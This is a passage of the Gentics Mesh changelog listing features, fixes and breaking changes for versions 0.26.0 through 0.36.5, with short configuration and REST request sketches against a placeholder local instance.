icon:plus[] Search: The `search.includeBinaryFields` config setting and `MESH_ELASTICSEARCH_INCLUDE_BINARY_FIELDS` environment variable can be used to control whether binary field metadata and plain text content should be added to the search index. By default metadata and content will be added to the search index.
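Taken together, a `mesh.yml` sketch of the cache and parser settings introduced in the 0.36.6 and 0.36.5 entries above (values are examples; the nesting is an assumption derived from the dotted option names):

[source,yaml]
----
cache:
  pathCacheSize: 20000        # webroot/GraphQL path cache size
upload:
  parser: false               # skip metadata and content extraction for uploads
search:
  includeBinaryFields: false  # keep binary metadata/plain text out of the index
----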
icon:plus[] REST: A core library for JSON support (Jackson) has been updated.

icon:plus[] GraphQL: The performance when loading nodes via the schema field has been improved.

icon:plus[] Core: Various internal calls have been improved to increase read performance.

icon:check[] Search: Fixed the root cause of an unnecessary full sync which could occur during schema migrations.

[[v0.36.4]]
== 0.36.4 (05.07.2019)

icon:check[] GraphQL: Fixed a bug that caused an error when filtering a node from a schema context that has no content in the default language.

icon:plus[] Graph: The `storage.synchronizeWrites` config setting and `MESH_GRAPH_SYNC_WRITES` environment variable can be used to control whether write operations should be executed synchronously. By default write operations are handled asynchronously.

icon:check[] Core: Performance of schema migration has been improved.

[[v0.36.3]]
== 0.36.3 (04.07.2019)

icon:plus[] Search: Two new options have been added to the mesh search configuration. When the encoded request length exceeds the new `bulkLengthLimit`, no new documents will be added to the bulk and the bulk will be sent to Elasticsearch. The new `retryLimit` causes Gentics Mesh to drop a request to Elasticsearch after the configured limit has been reached. link:https://github.com/gentics/mesh/issues/784[#784]

icon:check[] Search: Backpressure for handling index requests has been improved. This reduces memory usage when indexing large amounts of data in a short period of time. link:https://github.com/gentics/mesh/issues/785[#785]

icon:check[] Search: Some default configuration values have been changed. `timeout`: `8000` -> `60000`, `bulkLimit`: `2000` -> `100`. These changes will not be applied to existing configurations.

icon:check[] REST: Various branch specific internal checks have been updated to fix potential error cases. link:https://github.com/gentics/mesh/issues/787[#787]

icon:check[] Logging: The default logging configuration now includes the Java class for each log message.

[[v0.36.2]]
== 0.36.2 (02.07.2019)

icon:check[] Search: Encoding issues which happened on systems that were not using `UTF-8` as the default locale have been fixed by updating the underlying Elasticsearch client. link:https://github.com/gentics/mesh/issues/498[#498]

icon:plus[] Search: It is now possible to use encrypted and authenticated connections between Gentics Mesh and Elasticsearch. New settings and environment variables have been added. Details can be found in the link:{{< relref "elasticsearch.asciidoc" >}}#_security[Elasticsearch documentation]. link:https://github.com/gentics/mesh/issues/759[#759]

icon:plus[] Security: The 'spring-security' library has been updated.

icon:plus[] OrientDB: The included OrientDB version has been updated to version 3.0.21

icon:plus[] GraphQL: You can now track ingoing node references.
See the link:{{< relref "graphql.asciidoc" >}}#_loading_ingoing_references[example] in the documentation.

icon:check[] Search: Fixed a bug that caused configured timeouts to not be applied correctly.

[[v0.36.1]]
== 0.36.1 (18.06.2019)

icon:plus[] Core: Support for the Java 11 runtime has been added.

icon:plus[] Docker: The base image of the `gentics/mesh` and `gentics/mesh-demo` images has been updated to use the `adoptopenjdk/openjdk11:x86_64-alpine-jre-11.0.3_7` image.

icon:plus[] Docker: The included Elasticsearch version has been updated to version 6.8.0. Please note that support for embedded Elasticsearch will be dropped in the future.

icon:check[] REST: The deletion of microschemas which contain changes has been fixed. Previously a `NotImplementedException` was thrown for microschemas which contained changes. link:https://github.com/gentics/mesh/issues/589[#589]

icon:check[] REST: Error messages should now always be wrapped in JSON. Previously, internal server errors were returned as plain text.

icon:check[] GraphQL: Fixed a bug that caused the default language of a node to be fetched when loading a node list of a micronode.

icon:plus[] Core: Various internal structures and dependencies were re-organized and refactored.

icon:plus[] UI: The default set of enabled languages within the `mesh-ui-config.js` file has been updated to include more languages.

[[v0.36.0]]
== 0.36.0 (12.06.2019)

CAUTION: Java REST Client

[quote]
____

The default field values for `NodeResponse` and `AbstractGenericRestResponse` have been updated.

The following values have been changed:

* `AbstractGenericRestResponse#permissions`
* `NodeResponse#tags`
* `NodeResponse#childrenInfo`
* `NodeResponse#container`
* `NodeResponse#fields`
* `NodeResponse#breadcrumb`

The `NodeResponse#isContainer` method has been deprecated and was replaced by `NodeResponse#getContainer`.

Applications which use the affected models will most likely not need to be updated since the returned response will always set the affected fields.
____

icon:plus[] REST: The `?fields` query parameter which can be used to filter response properties will now work more granularly on node responses.
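A request sketch for the parameter (Python with `requests`; the host and project name are placeholders, and the selected property names are examples):

[source,python]
----
import requests

BASE = "http://localhost:8080"  # placeholder instance

# Trim each node in the response down to its uuid property.
resp = requests.get(f"{BASE}/api/v2/demo/nodes",
                    params={"fields": "uuid"})
print(resp.status_code)
----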
CAUTION: Custom node migration scripts have been removed.

[quote]
____

The script system was a source of possible errors and performance problems. Also, the Nashorn JavaScript engine has been deprecated with the release of Java 11. If you need to change data for a migration, use the REST API instead.
____

icon:check[] REST: Fixed a bug that sometimes caused a wrong image to be sent to the client when using image manipulation. link:https://github.com/gentics/mesh/issues/669[#669]

icon:plus[] REST: Error messages now contain the property `i18nKey`. This allows for easy identification of different errors.

[[v0.35.0]]
== 0.35.0 (06.06.2019)

CAUTION: REST Model: The `BranchResponse#isMigrated` method has been changed to `BranchResponse#getMigrated`.

NOTE: Fetching fields of a node/micronode in GraphQL requires a different query in `/api/v2`. Please refer to link:https://github.com/gentics/mesh/issues/428[#428] and link:https://github.com/gentics/mesh/issues/317[#317] for details.

icon:check[] Backup: Fixed a `NullPointerException` which occurred when the backup directory was missing and the backup endpoint was invoked. link:https://github.com/gentics/mesh/issues/463[#463]

icon:plus[] Core: The core Vert.x library was updated to version `3.7.1`.

icon:check[] Focal point: It is now possible to use the `{apiLatest}/:projectName/nodes/:uuid/binaryTransform/:fieldName` endpoint to resize an image and set the focal point in one operation.

icon:check[] The `Content-Disposition` header will now contain the UTF-8 and ISO-8859-1 encoded filename. link:https://github.com/gentics/mesh/issues/702[#702]

icon:plus[] REST: It is now possible to set a flag that forces a user to change their password on the next login. Take a look at link:{{< relref "authentication.asciidoc" >}}#_forcing_user_to_change_password[the documentation] for more information, and see the sketch at the end of this section.

icon:check[] REST: Fixed a bug that sometimes caused a wrong image to be returned when using image manipulation. link:https://github.com/gentics/mesh/issues/669[#669]
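A sketch of the forced password change flow (Python with `requests`; host, UUID and credentials are placeholders, and using `POST` for the user update mirrors the other update requests in this changelog — an assumption):

[source,python]
----
import requests

BASE = "http://localhost:8080"  # placeholder instance

admin = requests.Session()
admin.post(f"{BASE}/api/v2/auth/login",
           json={"username": "admin", "password": "admin"})

user_uuid = "deadbeef0000000000000000000000aa"  # placeholder user UUID

# Force the user to change their password on the next login.
admin.post(f"{BASE}/api/v2/users/{user_uuid}",
           json={"forcedPasswordChange": True})

# The user then supplies newPassword along with the old credentials.
# (Sending newPassword without the flag set returns an error, see 0.36.7.)
requests.post(f"{BASE}/api/v2/auth/login",
              json={"username": "joe", "password": "old-secret",
                    "newPassword": "new-secret"})
----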
[[v0.34.0]]
== 0.34.0 (28.05.2019)

icon:bullhorn[] Versioning Enhancements

[quote]
____

The versioning system has received various enhancements.

link:{{< relref "features.asciidoc" >}}#auto-purge[Auto Purge]

The auto purge feature will now automatically purge the previous, no longer needed version of a content. You can control this behaviour using the `autoPurge` flag in the `mesh.yml` file.

Additionally, schemas may now contain an `autoPurge` flag to override the setting on a per schema basis.

The documentation contains detailed information about how versioning can be controlled.

link:{{< relref "features.asciidoc" >}}#_listing_versions[Listing Versions]

Versions of a node can now be listed via REST and GraphQL.

link:{{< relref "features.asciidoc" >}}#_purging_versions[Purging Versions]

Versions can now be purged across projects to reduce disk storage usage.
____

icon:check[] Java REST Client: Fixed a bug that prevented automatic reconnection to the eventbus when it did not succeed immediately.

icon:check[] Upload: The document processing library _tika_ has been updated to version `1.21` to fix potential out of memory issues during upload document processing.

icon:check[] Branch Migration: A bug in the branch migration process has been fixed. Previously the wrong version of the content was used as the branch root version. The process will now utilize the published version if one exists and otherwise use the draft version. This fix only affected internal data handling.

[[v0.33.1]]
== 0.33.1 (23.05.2019)

icon:check[] Core: The dependency _hazelcast-kubernetes_ has been set to version 1.2.2 to fix a compatibility issue with the used Hazelcast version.

[[v0.33.0]]
== 0.33.0 (20.05.2019)

icon:bullhorn[] Elasticsearch document handling

[quote]
____

The support for the Elasticsearch ingest plugin has been removed. The same functionality has been replaced with a much more efficient implementation which extracts the plain text of a document during upload processing. The structure of the generated search index has not changed and thus no modifications to existing search queries are required.

The plain text will now also be included in the REST and GraphQL responses of binary fields.

An automatic changelog entry has been added which will parse all uploaded documents and extract the plain text. The duration of the execution of this task depends on the amount of documents that need to be parsed.

The new __mesh.yml__ setting `upload.parserLimit` can be used to control the document parser. See the link:{{< relref "features.asciidoc" >}}#_text_extraction[Text extraction documentation] for more information.
____

icon:plus[] Search: The embedded elastichead interface has been removed. It is recommended to use browser extensions like link:https://chrome.google.com/webstore/detail/elasticsearch-head/ffmkiejjmecolpfloofpjologoblkegm[ElasticSearch Head for Chrome] instead.

icon:check[] Core: Various internal libraries have been updated (logback, hazelcast-kubernetes, tika).

icon:plus[] OrientDB: The included OrientDB version has been updated to version 3.0.19

[[v0.32.0]]
== 0.32.0 (08.05.2019)

icon:bullhorn[] Event Handling

[quote]
____

The event handling mechanism has been completely overhauled.

*Changes*

* Additional events have been added
* Event payload includes more information
* Java models for events have been added

*API*

The API class `com.gentics.mesh.MeshEvent` was replaced by `com.gentics.mesh.core.rest.MeshEvent`.

A detailed description of this feature can be found in our link:{{< relref "events.asciidoc" >}}[Event Documentation].
____

icon:bullhorn[] Elasticsearch Handling

[quote]
____

The Elasticsearch integration has been overhauled.

*Integration*

Elasticsearch synchronization operations have been decoupled from regular write operations.

This has two main effects. First, regular write operations (e.g. node update, node create) will not block until the changed data has been synchronized with Elasticsearch. This will result in higher overall write performance. Secondly, changes will not be directly visible in Elasticsearch since write operations in Elasticsearch have been decoupled and will be executed asynchronously after an element in Gentics Mesh has been modified. Implementations which rely heavily on Gentics Mesh being in sync with Elasticsearch for each operation may need to be adapted. When using the `/search` or `/rawSearch` endpoints in mesh, you can now provide the `?wait=true` query parameter (see the sketch after this announcement). See details link:{{< relref "elasticsearch.asciidoc" >}}#endpoints[here].

*Fixes*

Various issues with the previous Elasticsearch synchronization mechanism have been addressed.

* Deletion of nodes will now also update documents in the index which reference the deleted node
* Tag and tag family deletion will now correctly update referenced tags, tag families and nodes

*Startup*

Gentics Mesh will no longer wait for Elasticsearch during start-up.

*Resilience*

The resilience against Elasticsearch server issues has been improved. Failed requests will automatically be retried. If too many issues occur, Gentics Mesh will automatically invoke an index sync in order to recover from the issue. This sync will be retried until Elasticsearch becomes responsive again.

*Syncing*

The clear and sync mechanism has been streamlined in order to benefit from other changes like resilience.

____
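A sketch of a search request that opts into waiting (Python with `requests`; the host is a placeholder and the Elasticsearch query, including the queried field name, is an arbitrary example):

[source,python]
----
import requests

BASE = "http://localhost:8080"  # placeholder instance

# A plain Elasticsearch query; the field name is only an example.
query = {"query": {"match": {"fields.name": "Concorde"}}}

# wait=true defers the response until pending index operations are visible.
resp = requests.post(f"{BASE}/api/v2/search/nodes",
                     params={"wait": "true"}, json=query)
print(resp.status_code)
----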
NOTE: It is not required to reindex documents since the index names and structure have not changed.

icon:check[] File Handling: The file upload mechanism has been overhauled to address issues with blocked uploads which could occur when uploading multiple files in parallel.

icon:check[] File Handling: Failed uploads will now remove temporary files from disk. Previously, in some error situations the temporary upload files were not removed.

icon:check[] Permissions: Applying permissions recursively on projects did not affect branches. This has been fixed.

icon:plus[] Permissions: Setting permissions recursively is now done more efficiently.

icon:plus[] Thread Usage: The overall request handling has been refactored to reduce situations in which the event-loop threads could be blocked. The request handling code has been unified.

icon:plus[] Core: The core Vert.x library was updated to version 3.7.0

icon:plus[] Performance: The overall read performance has been improved. The memory usage has been reduced.

[[v0.31.6]]
== 0.31.6 (27.05.2019)

icon:check[] Java REST Client: Fixed a bug that prevented automatic reconnection to the eventbus when it did not succeed immediately.

[[v0.31.5]]
== 0.31.5 (07.05.2019)

icon:check[] REST: The `publish` and `readPublished` permissions are now only shown for nodes.

icon:check[] Core: Creation of schemas with the same name as an existing microschema, or vice versa, is no longer allowed. Doing so caused conflicts in GraphQL. link:https://github.com/gentics/mesh/issues/597[#597]

icon:check[] Core: A bug in the image transform endpoint has been fixed. Previously nodes which were updated using that endpoint could not be found via webroot anymore. link:https://github.com/gentics/mesh/issues/599[#599]

icon:plus[] Job: The endpoint `POST {apiLatest}/admin/jobs/:jobUuid/process` has been added. It can be used to trigger job processing. The endpoint will also automatically reset a failed job to be queued again. The endpoints `DELETE {apiLatest}/admin/jobs/:jobUuid/error` and `POST {apiLatest}/admin/processJobs` will be removed in a future release. link:https://github.com/gentics/mesh/issues/171[#171]

icon:check[] Plugins: A `NullPointerException` which occurred when accessing `rc.user().principal()` within a plugin has been fixed. link:https://github.com/gentics/mesh/issues/516[#516]

icon:check[] REST: Creating a schema with a micronode field and the allow option set to `[]` will now allow micronodes of all microschemas. link:https://github.com/gentics/mesh/issues/431[#431]

icon:check[] Core: Fixed a bug that caused an internal server error when applying changes to a microschema. link:https://github.com/gentics/mesh/issues/591[#591]

icon:check[] UI: Fixed validation issues in microschema lists when updating nodes. Previously validation issues would not be detected by the UI and the node update would fail. link:https://github.com/gentics/mesh-ui/pull/202[#202]

[[v0.31.4]]
== 0.31.4 (11.04.2019)

icon:check[] Schema: The `container` flag in the schema update request is now optional. Omitting the value will no longer cause Gentics Mesh to use the default value `false`. Subsequently the Java request model was altered. The `Schema#isContainer` method was replaced with `Schema#getContainer`. Older REST client versions which by default always specified the container flag are still compatible with this change. link:https://github.com/gentics/mesh/issues/165[#165]

icon:check[] GraphQL: The permission check for the `nodes` field of the type `Tag` has been fixed. Previously loading tagged nodes for a tag did not return the expected result because the `published` permission for published nodes was not checked correctly.

icon:plus[] Logging: The default `logback.xml` file has been updated to include automatic scanning of the logging configuration.
This change will not be applied to existing configurations.

icon:check[] Schema: It is now possible to reset the `allow` property of string fields. Setting `allow` to an empty array will no longer restrict the values. Instead it will revert back to the original behaviour and allow all values.

icon:check[] UI: Fixed a bug that caused the node list to jump to the first page on various actions. link:https://github.com/gentics/mesh-ui/issues/195[#195]

[[v0.31.3]]
== 0.31.3 (28.03.2019)

icon:plus[] Logging: The conflict error logging has been improved. Conflict error information in the log will now be more detailed and also include the conflicting field key and versions.

icon:check[] Permissions: A bug in the GraphQL `nodes` field was fixed. Previously branches were not correctly handled and too many nodes would be returned. Additionally, the field would not correctly handle the read published permission and would also return draft nodes to which no read permission was granted.

[[v0.31.2.1]]
== 0.31.2.1 (23.08.2019)

icon:plus[] Logging: Additional activity information will be logged when the logger for class `io.vertx.core.eventbus.EventBus` is set to level `DEBUG`.

icon:check[] REST: Fixed a bug which prevented the `DELETE /api/v1/admin/jobs/:jobUuid/error` endpoint from resetting the job.

[[v0.31.2]]
== 0.31.2 (22.03.2019)

icon:plus[] Docker: Default memory settings for the server and demo docker images were updated. The `-Dstorage.diskCache.bufferSize=256` setting has been added for the server image. The setting can be changed using the `JAVA_TOOL_OPTIONS` environment variable. See the link:https://getmesh.io/docs/administration-guide/#_memory_settings[Memory documentation] for more information and recommendations.

icon:plus[] OrientDB: The included OrientDB version has been updated to version 3.0.18.

icon:check[] REST: The `GET {apiLatest}/:projectName/nodes/:nodeUuid/binary/:fieldName` endpoint will now always include the `accept-ranges: bytes` header to indicate to the client that it supports range requests (see the sketch at the end of this section). link:https://github.com/gentics/mesh/issues/643[#643]

icon:check[] Configuration: The Elasticsearch bulk limit can now be configured using the `MESH_ELASTICSEARCH_BULK_LIMIT` environment variable.

icon:check[] Permissions: A bug in the GraphQL permission handling has been fixed. Previously nodes which only had the read published permission assigned to them were not returned by the `nodes` field.

icon:check[] Permissions: A bug in the permission handling of the nav root endpoint has been fixed. Previously nodes which only had the read published permission assigned to them were not included in the navigation response.
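A range request sketch against the binary endpoint named above (Python with `requests`; host, project, node UUID and field name are placeholders; the `Range` header is standard HTTP):

[source,python]
----
import requests

BASE = "http://localhost:8080"  # placeholder instance
node_uuid = "deadbeef0000000000000000000000bb"  # placeholder node UUID

# Fetch only the first kilobyte of the binary field "binary".
resp = requests.get(f"{BASE}/api/v2/demo/nodes/{node_uuid}/binary/binary",
                    headers={"Range": "bytes=0-1023"})

print(resp.status_code)                   # 206 Partial Content for a satisfied range
print(resp.headers.get("Accept-Ranges"))  # "bytes", as advertised by the endpoint
print(len(resp.content))                  # at most 1024 bytes
----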
[[v0.31.1]]
== 0.31.1 (18.03.2019)

icon:plus[] GraphDB Import/Export: The endpoints `POST {apiLatest}/admin/graphdb/export` and `POST {apiLatest}/admin/graphdb/import` have been added.

[[v0.31.0]]
== 0.31.0 (13.03.2019)

icon:bullhorn[] Monitoring

[quote]
____
This version of Gentics Mesh introduces the __Monitoring feature__.

The Gentics Mesh server will now bind to port `8081` in addition to port `8080` in order to provide the new monitoring API. New configuration settings have been added to allow configuration of this server.

NOTE: The monitoring API should not be exposed publicly and will by default only bind to `localhost`.

A detailed description of this feature can be found in our link:{{< relref "monitoring.asciidoc" >}}[Monitoring Documentation].
____

CAUTION: In a future release the following endpoints will be removed from the regular API (port 8080) since they were moved to the new monitoring server API (port 8081).

* `GET {apiLatest}/admin/status` (Server Status)
* `GET {apiLatest}/admin/cluster/status` (Cluster Status)

CAUTION: Because of a change in the image resizer, the change below might not apply when an image is already in the cache. To make sure that the changes take effect, the cache in `data/binaryImageCache/` must be cleared.

icon:plus[] Image: The quality of manipulated JPEG images can now be configured. The default value has been changed from `0.7` to `0.95`.

icon:plus[] Image: The filter for resizing images can now be configured. The default filter is Lanczos.

icon:plus[] OrientDB: The included OrientDB version has been updated to version 3.0.17.

icon:plus[] REST: The `/users` endpoint response will now contain a hash of a user's roles.

icon:plus[] GraphQL: The `roles` field is now available for user fields, and contains all roles of the respective user.

icon:plus[] GraphQL: The `rolesHash` field is now available for user fields, and contains a hash of all the roles of the respective user. This field does not need any special permissions.

icon:check[] Fixed a bug in the consistency checks which incorrectly reported missing user role shortcuts.

icon:check[] Schema: A bug was fixed which prevented updating the schema `elasticsearch` property to the value `null`.

icon:plus[] Docker: Default memory settings for the server and demo docker images were added. The default for the server is set to `-Xms512m -Xmx512m -XX:MaxDirectMemorySize=256m`. The setting can be changed using the `JAVA_TOOL_OPTIONS` environment variable. See the link:https://getmesh.io/docs/administration-guide/#_memory_settings[Memory documentation] for more information.

icon:check[] The `.vertx` cache folder was moved to the configurable `data/tmp` folder.

[[v0.30.2]]
== 0.30.2 (28.02.2019)

icon:plus[] OrientDB: The included OrientDB version has been updated to version 3.0.16. This update addresses various locking and synchronization issues when clustering was enabled.

icon:check[] Restore: The restore process has been reworked to avoid issues with graph database indices. Additional error handling has been added.

icon:check[] Backup: Backup support for clustered mode has been added. The backup endpoint previously did not work as expected in clustered mode.

[[v0.30.1]]
== 0.30.1 (15.02.2019)

icon:plus[] GraphQL: Nodes can now be loaded via a list of UUIDs.

icon:check[] Java REST Client: Fixed a bug that occurred when calling `getResponse()` together with `getBody()` on a binary response.

icon:check[] Java REST Client: Fixed a bug in the `MeshRestClient#isOneOf` helper function.

[[v0.30.0]]
== 0.30.0 (12.02.2019)

CAUTION: Java REST Client: The Gentics Mesh Java REST client which was based on Vert.x was replaced with an `OkHttpClient` based implementation. Some changes to the client interface were necessary to make the client independent of Vert.x.
See link:https://getmesh.io/docs/platforms/#_java[this example] and the Javadoc for more information.

icon:check[] Clustering: The mesh version will no longer be appended to the node name used for OrientDB clustering. It is recommended to sanitize the `data/graphdb/storage/distributed-db-config.json` file and remove/rename entries which reference older mesh nodes. Only the active nodes should be listed in the file.

icon:check[] Core: Fixed a bug that caused overly long responses on binary range requests.

icon:check[] GraphQL: Fixed a bug when loading a node via path. When the node itself did not exist, the query would return its parent node.

[[v0.29.10]]
== 0.29.10 (08.02.2019)

icon:check[] Clustering: Cluster stability has been increased by reducing concurrent transaction locks during delete requests.

[[v0.29.9]]
== 0.29.9 (07.02.2019)

icon:check[] Clustering: Cluster stability has been increased by reducing concurrent transaction locks during create/update requests.

[[v0.29.8]]
== 0.29.8 (05.02.2019)

icon:check[] Clustering: The mesh version will no longer be appended to the node name used for OrientDB clustering. It is recommended to sanitize the `data/graphdb/storage/distributed-db-config.json` file and remove/rename entries which reference older mesh nodes. Only the active nodes should be listed in the file.

[[v0.29.7]]
== 0.29.7 (05.02.2019)

icon:check[] Clustering: The default `writeQuorum` has been set to `majority` to increase cluster stability. A `writeQuorum` of `1` can cause synchronization issues.

icon:check[] Elasticsearch: The Elasticsearch synchronization verticle will no longer be deployed when no Elasticsearch has been configured.

[[v0.29.6]]
== 0.29.6 (01.02.2019)

icon:plus[] Core: The way editor references are stored has been refactored to increase performance and reduce contention during database operations. A changelog entry will be invoked which migrates the data.

[[v0.29.5]]
== 0.29.5 (31.01.2019)

icon:check[] Clustering: The creation of edges which led to higher contention in the graph has been removed from jobs. Jobs will currently no longer reference the creator.

icon:check[] Search: An error which was thrown by outdated branch schema assignments has been suppressed. A warning will be logged instead.

[[v0.29.4]]
== 0.29.4 (28.01.2019)

icon:check[] Restore: A check has been added which will disable the restore operation while running in clustered mode.

icon:check[] Demo: The demo has been fixed. Previously some of the demo files were missing.

[[v0.29.3]]
== 0.29.3 (25.01.2019)

icon:plus[] OrientDB: The included OrientDB version has been updated to version 3.0.14

icon:check[] Core: The job processing will no longer be invoked at a fixed interval in order to reduce cluster operation contention.
Instead, the `{apiLatest}/admin/processJobs` endpoint can be used to manually trigger job processing.

icon:check[] Core: Fixed a bug that caused nodes with a slash in their segment field to not be found via webroot.

icon:check[] Restore: A `ClassCastException` has been fixed which could be observed directly after a backup restore operation.

icon:check[] Changelog: The automatic backup of OrientDB configurations which was executed during the 0.29.0 update has been removed.

[[v0.29.2]]
== 0.29.2 (18.01.2019)

icon:plus[] Changelog: The changelog execution performance has been increased.

icon:plus[] Consistency Checks: Additional consistency checks and repair actions have been added.

icon:check[] Restore: An error will be returned when `{apiLatest}/admin/graphdb/restore` is invoked in clustered mode. Restoring the database is not possible in this mode.

icon:check[] Elasticsearch: Fixed a bug that caused a schema migration to never finish. This affected nodes with binaries that are readable by the Elasticsearch Ingest Attachment Processor Plugin.

icon:check[] Image: Resizing images will now use the balanced quality setting. This helps with images that suffered from visible aliasing. To make sure that the changes take effect, the cache in `data/binaryImageCache/` must be cleared.

[[v0.29.1]]
== 0.29.1 (16.01.2019)

CAUTION: Because of a change in the image cache, the change below might not apply when an image is already in the cache. To make sure that the changes take effect, the cache in `data/binaryImageCache/` must be cleared.

icon:plus[] Core: The performance of the deletion process has been increased.

icon:plus[] Consistency Checks: Additional consistency checks and repair actions have been added.

icon:plus[] Consistency Checks: The consistency endpoint response will now also list a `repairCount` property which contains the count of repair operations. The response will now only contain the first 200 results. The `outputTruncated` property indicates whether the result has been truncated.

icon:check[] Image: Resizing and cropping will no longer transform the image to the JPG format but return an image in the original format. When no image writing plugin for this format is available, the fallback is PNG.

icon:check[] Core: Node deletion will now also remove connected lists and micronodes. Previously these elements were not properly removed. On large systems this could lead to increased disk usage.

[[v0.29.0]]
== 0.29.0 (14.01.2019)

CAUTION: The embedded graph database was updated from version 2.2.37 to 3.0.13. See the required changes below.

icon:plus[] OrientDB 3.0.x: Existing `orientdb-server-config.xml`, `hazelcast.xml` and `default-distributed-db-config.json` configuration files will automatically be moved aside and new configuration files will be created instead.

icon:plus[] OrientDB 3.0.x: A reindex of all vertices and edges will be triggered during the first start-up. This can take some time depending on the database size.

icon:plus[] Memory: The internal overall memory usage has been optimized.

icon:plus[] Core: The way language references are stored has been refactored to increase performance and reduce contention during database operations.
A changelog entry will be invoked which migrates the data.

icon:check[] Clustering: The OrientDB 3.0.13 update addresses various issues which were related to clustering.

icon:check[] Migrations: The schema migration code has been optimized for speed and memory usage.

icon:check[] Migrations: Schema migrations will now always be executed on the cluster node which also handled the REST request. Previously the migration was executed on a random node in the cluster.

icon:check[] Core: The internal transaction retry max count has been reduced from 100 to 10 iterations.

icon:check[] Core: The internal transaction handling has been optimized.

icon:check[] Security: A minor security issue has been fixed.

[[v0.28.3]]
== 0.28.3 (09.01.2019)

icon:check[] GraphQL: Resolved links will now contain the hostname of the target branch, not the latest branch.

icon:check[] Elasticsearch: Search indices are now created sequentially. Parallel creation of indices caused problems when many indices had to be created.

icon:plus[] Core: When resolving links with type FULL, and the chosen branch is not the latest branch, the query parameter for the branch will be added to the rendered link.

icon:plus[] Java REST Client: Added a new REST client implementation. The `MeshRestOkHttpClientImpl` implementation will replace the current Java client in a future release. It is advised to switch to the new implementation, which is based on the OkHttp library instead of Vert.x.

[[v0.28.2]]
== 0.28.2 (26.11.2018)

icon:check[] Changelog: Enhanced the changelog entry fix from release `0.28.1` to fix additional issues.

[[v0.28.1]]
== 0.28.1 (26.11.2018)

icon:plus[] Java REST Client: The `version` property of the `NodeUpdateRequest` is now by default set to `draft`. Setting the value to draft will override the conflict detection handling and always compare the posted data with the latest draft version.

icon:plus[] Java REST Client: The `upsertNode` method has been added to the REST client. It can be used to create or update a node.

icon:plus[] Demo: The example UUIDs and dates in the `{apiLatest}/raml` response and the documentation are now static and will no longer change between releases. link:https://github.com/gentics/mesh/issues/477[#477]

icon:plus[] Core: Deletion of micronode and list field data has been implemented in the core. Previously these elements were not removed from the graph. link:https://github.com/gentics/mesh/issues/192[#192]

icon:check[] Changelog: Fixed a bug in the webroot index database migration entry which caused an `ORecordDuplicatedException` changelog error and prevented the update and startup of older databases. link:https://github.com/gentics/mesh/issues/554[#554], link:https://github.com/gentics/mesh/issues/546[#546]

icon:check[] Core: Fixed a bug that caused link:https://getmesh.io/docs/api/#project__branches__branchUuid__migrateSchemas_post[/migrateSchemas] to fail when a newer schema version was not assigned to the branch. link:https://github.com/gentics/mesh/issues/532[#532]

icon:check[] Core: Nodes are now migrated to the newest schema version when a new branch is created.
link:https://github.com/gentics/mesh/issues/521[#521]

icon:check[] Core: Fixed a bug that prevented moving a published node in one language to a published container of another language.

[[v0.28.0]]
== 0.28.0 (20.11.2018)

CAUTION: The property `meshNodeId` of the `{apiLatest}/` response was renamed to `meshNodeName` to be more consistent.

icon:plus[] REST: It is now possible to set existing or new tags during node creation and node update. Tags that are listed in those requests will be created if not found and assigned to the updated or created node.

icon:plus[] Eventbus: It is now possible to register custom eventbus addresses.

icon:plus[] REST: Downloads of binaries will now support byte range requests. Web media players require this feature in order to support seeking in video streams.

icon:plus[] API: OAuth2 server options can now be overridden via environment variables.

icon:check[] Permissions: A bug in the permission handling has been fixed. Previously the read permission was also granted when the create permission was granted on elements. link:https://github.com/gentics/mesh/issues/562[#562]

icon:check[] Branches: Resolved links will now contain the hostname of the target branch, not the latest branch.

icon:check[] Elasticsearch: The check for the `ingest-attachment` plugin was fixed for installations which were using the `AWS` Elasticsearch service.

icon:check[] REST: A concurrency issue has been fixed which could lead to problems when creating multiple schemas in parallel.

icon:check[] REST: Fixed the error message when no node for a content can be found. link:https://github.com/gentics/mesh/issues/364[#364]

[[v0.27.2]]
== 0.27.2 (07.11.2018)

icon:check[] REST: The CPU utilization for download requests has been reduced. link:https://github.com/gentics/mesh/issues/530[#530]

icon:plus[] Core: The Gentics Mesh server will now use native bindings to increase HTTP performance on Linux x86_64 platforms.

icon:check[] REST: Branch create requests will now correctly set the path prefix property. The value of the property was previously not used.

icon:check[] REST: Added more detailed error information when accessing a resource without permission. link:https://github.com/gentics/mesh/issues/314[#314]

[[v0.27.1]]
== 0.27.1 (31.10.2018)

icon:plus[] REST: It is now possible to specify a path prefix for branches. When specified, all resolved paths will include the prefix. The webroot endpoint will also utilize the prefix to resolve nodes. The prefix can be set for new projects or via update requests on existing branches (see the sketch at the end of this section).

icon:check[] Java REST Client: Fixed wrong log output information.

icon:check[] REST: Fixed an error while fetching jobs for deleted projects.

icon:plus[] Elasticsearch: The index sync will now automatically remove indices which are no longer used.

icon:check[] REST: Fixed an error that could happen when creating new nodes which contain binary fields that reference a not yet stored binary sha512sum. link:https://github.com/gentics/mesh/issues/524[#524]
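A sketch of setting the prefix on an existing branch (Python with `requests`; host, project and branch UUID are placeholders, and the `pathPrefix` property name is an assumption — the changelog only names a "path prefix property"):

[source,python]
----
import requests

BASE = "http://localhost:8080"  # placeholder instance

session = requests.Session()
session.post(f"{BASE}/api/v2/auth/login",
             json={"username": "admin", "password": "admin"})

branch_uuid = "deadbeef0000000000000000000000cc"  # placeholder branch UUID

# Assumed property name; afterwards all resolved paths include the prefix.
session.post(f"{BASE}/api/v2/demo/branches/{branch_uuid}",
             json={"pathPrefix": "/site-a"})
----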
[[v0.27.0]]
== 0.27.0 (19.10.2018)

CAUTION: The volumes inside the docker images `gentics/mesh` and `gentics/mesh-demo` have been refactored. By default the volumes `/graphdb`, `/uploads`, `/backups`, `/plugins`, `/keystore` and `/config` will be used for the corresponding data. The `/data` volume and location was removed. Details can be found in the link:{{< relref "administration-guide.asciidoc" >}}#_volumes_locations[documentation].

icon:plus[] Configuration: It is now possible to configure the upload limit using the `MESH_BINARY_UPLOAD_LIMIT` environment variable.

icon:plus[] Java REST Client: It is now possible to set the base path of the API via `MeshRestClient#setBaseUri(String uri)`.

icon:check[] Security: A minor security issue has been fixed.

icon:check[] REST: An issue with the ETag generation of user responses has been fixed. link:https://github.com/gentics/mesh/issues/489[#489]

[[v0.26.0]]
== 0.26.0 (15.10.2018)

icon:plus[] Branches: It is now possible to set the "latest" branch of a project.

icon:plus[] Branches: It is now possible to create branches based on specific other branches.

icon:plus[] Branches: Branches can now be tagged just like nodes.

